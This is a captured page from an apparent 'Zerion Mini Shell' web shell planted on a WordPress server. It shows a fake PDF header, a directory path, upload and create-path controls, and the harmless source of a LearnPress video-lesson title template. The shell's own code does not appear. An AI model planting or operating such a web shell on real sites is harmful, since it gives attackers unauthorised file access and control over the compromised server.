%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/itworks/wp-content/plugins/learnpress/templates/content-lesson/video/
Upload File :
Create Path :
Current File : /var/www/html/itworks/wp-content/plugins/learnpress/templates/content-lesson/video/title.php

<?php
/**
 * Template for displaying title of video lesson.
 *
 * This template can be overridden by copying it to yourtheme/learnpress/content-lesson/video/title.php.
 *
 * @author   ThimPress
 * @package  Learnpress/Templates
 * @version  3.0.0
 */

/**
 * Prevent loading this file directly
 */
defined( 'ABSPATH' ) || exit();

$lesson = LP_Global::course_item();

if ( ! $title = $lesson->get_title( 'display' ) ) {
	return;
}
?>

<h3 class="course-item-title question-title"><?php echo $title; ?></h3>

Zerion Mini Shell 1.0